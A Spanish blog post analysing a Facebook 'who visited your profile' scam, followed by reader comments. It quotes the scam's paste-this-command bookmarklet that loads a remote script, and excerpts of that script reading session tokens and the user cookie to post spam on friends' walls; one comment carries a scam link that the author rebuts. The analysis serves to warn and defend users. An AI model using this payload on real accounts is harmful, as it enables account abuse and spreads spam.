Buenas a todos, utilizo este pequeño descanso de estudio para escribir esta mini entrada.
Acabo de ver que en Facebook hay mucha gente con esto:
Te puedes creer que 31 personas han visitado mi perfil hoy? Ademas me dice quien y la hora jejej, si quieres saberlo pulsa Escanear perfil aqui abajo y podras ver tu contador.
Para variar, movido por la curiosidad ;), me he puesto a investigar.
Aquí os explico mis conclusiones: (Hoy no lo hago tan extenso que hay que estudiar!)
Me ha aparecido en mi muro lo siguiente:
Con la opción Escanear perfil" para que también podamos ver quién nos ha visitado hoy, obviamente me ha parecido muy extraño, por lo que he activado no-script y he pinchado a ver qué pasaba.
Al pinchar vas a esta página: http://www.lectorperf.es/?ref=nf y te sale lo siguiente:
Nos piden que clickemos en Copiar y que peguemos este código en nuestro navegador:
javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://lectorperf.es/perfil.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();
Estamos ante un código javascript, en el que una variable de entrada es Math.random() (Un sospechoso número aleatorio como la anterior vez.).
En el código también se puede observar esta dirección: 'http://lectorperf.es/perfil.js (dirección donde se aloja el código javascript "malicioso"). Si observamos el código de perfil.js vemos lo siguiente:
var message = "Te puedes creer que 31 personas han visitado mi
perfil hoy? Ademas me dice quien y la hora jejej, si quieres
saberlo pulsa Escanear perfilaqui abajo y podras ver tu contador."; var jsText = "http://www.lectorperf.es"; var myText = "Escanear perfil";
var post_form_id = document.getElementsByName('post_form_id')[0].value;var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var friends = new Array();gf = new XMLHttpRequest(); gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]= user&viewer=" + uid + "&"+Math.random(),false); gf.send()
...
Se puede ver que en las dos primeras variables se almacenan nuestros dos tokens "post_form_id" y "fb_dtsg", y que en la tercera variable almacena parte de la información de nuestra cookie :S (Mala pinta...)
También se ve que crea una tabla llamada friends (var friends = new Array()).
Y ya para qué hablar de la variable message...
Último fragmento importante:
...+ friends[i].uid + "&user_message=" + message;
httpwp.open("POST", urlwp, true);...
Conclusión: Volvemos a estar ante una aplicación de poco fiar. Y cómo no, las 31 visitas que dicen que hemos tenido son completamente falsas, tan sólo hace falta ver la variable message, siempre nos dicen lo mismo, es una frase predefinida que no cambia en ninguna parte del código. (modifico: a veces en vez de 31 visitas ponen otro número, pero sigue siendo lo mismo, una varible global del script, es decir, sigue siendo un engaño. modifico2: Ahora mismo lo han cambiado por 21 visitas: Te puedes creer que 21 personas han visitado mi perfil hoy?... Suponqo que irán cambiando de poco en poco, aunque me parece extraño que no hayan usado Math.random() para que las visitas parezcan más realistas.)
Lo único que hace este script es coger nuestros dos tokens "post_form_id" y "fb_dtsg" para poder realizar un ataque CSRF, en este caso el "ataque" consiste en escribir en el tablón de alguno de nuestros amigos que no nos perdamos la increíble aplicación que nos dice las visitas que hemos tenido hoy.
Como siempre digo... ¡Cuidad vuestra seguridad con las aplicaciones sospechosas de facebook! Esta vez el fin de esta aplicación tan sólo ha sido crear spam (para forrar a unos cuantos... otro día hablaré de ello.) pero en otras ocasiones nos podrían tomar el control de la cuenta!
Así que, ¡No os fieis de este tipo de aplicaciones!
6 comentarios:
Hola!! Soy "K" de Tacuarembò ,República Oriental del Uruguay!!seguro ni te suena ni lo has visto en el mapa ja ja!!pero me siento una bolu...!!por que hace al menos 30min que estoy tratando de "descubrir quien visita mi face"y ahora leo este comentario tuyo,(veo que sos muy entendido en lo que hablas)y me quiero morirrr!! que perdida de tiempo la mía!!hay otra forma de ber en verdad quien lo visita? gracias desde ya y desde tán lejos!!
Buenas "K"! La verdad que no me suena no, pero encantado estoy de que mi blog sea visitado por gente de distintos países. =)
Pues mira, como dije en este post: (http://movidoporlacuriosidad.blogspot.com/2011/04/analizando-aplicacion-sospechosa_306.html) Bajo mi punto de vista si Facebook hace algún cambio importante como añadir el botón de "no me gusta", permitir ver quién visita nuestro perfil o hacer el Facebook de pago, tranquila que ya se encargaran los del Facebook de avisarnos,(y no aplicaciones externas) nada de eventos basura de que le clickes en "me gusta" para poder ver las visitas o para que cambien los coloringos del Facebook.
Además, en mi opinión, a Facebook no le interesa que sepamos quién visita nuestro perfil, es el morbillo que tiene esto de las redes sociales, podemos cotillear a quien queramos sin que ellos lo sepan.
Un consejo, no pierdas más el tiempo en este tipo de aplicaciones o eventos de ver quién visita tu perfil o del estilo, a Facebook ni le interesa ser de pago (sus ganancias se basan básicamente en la publicidad), ni le interesa que la gente sepa quién te visita (por lo que no lo van a permitir), ni va a hacer ningún cambio importante sin avisarnos. Todo ese tipo de eventos que dicen “ser oficiales” ni caso, otra engañifa como otra cualquiera.
Espero haberte sido de utilidad. Si tienes alguna duda más no dudes en preguntar, si sé responderte lo haré. =)
Un saludo desde España.
Que tal la Madre Patria !!!???
También desde Uruguay te escribo, pero yo desde la capital Montevideo. Gracias por compartir tus conocimientos. Parece que por estos pagos se está diseminando estos virus con mucha virulencia.
Abrazo de PM
@PM, Muchas gracias a ti por visitar mi blog. =)
Más sobre saber quien ha visto tu perfil Facebook
http://adfc1625.filesonthe.net
No es cierto @Anónimo, no le hagan caso.
Otro timador más con ganas de ganar dinero haciendo perder el tiempo a la gente...
Publicar un comentario